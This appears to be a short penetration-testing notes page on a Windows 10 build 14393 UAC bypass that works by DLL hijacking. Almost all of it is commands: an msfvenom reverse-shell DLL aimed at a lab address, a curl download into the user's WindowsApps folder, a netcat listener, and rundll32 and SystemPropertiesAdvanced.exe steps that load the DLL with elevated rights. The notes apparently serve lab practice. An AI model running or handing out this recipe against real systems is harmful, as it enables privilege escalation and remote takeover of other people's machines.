search
LinkedInGithub
githubEdit

windows-10-14393-exploit

hashtag
Reviewing path variable

We can bypass UAC by placing a malicious DLL in the "windowsApps" folder.

cmd /c echo %PATH%

hashtag
Generating Malicious DLL library

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

hashtag
Transfer the library

python3 -m http.server
curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

hashtag
Start listener

nc -lvnp 8443

hashtag
Run the DLL library

Get a reverse shell

rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Terminate any instance of the rundll32 process (run as a normal user, not on reverse shell)

hashtag
Executing SystemPropertiesAdvanced.exe on Target host

nc -lvnp 8443 (should be running)

Previousweak-permisionNextwindows-desktop-versions

Last updated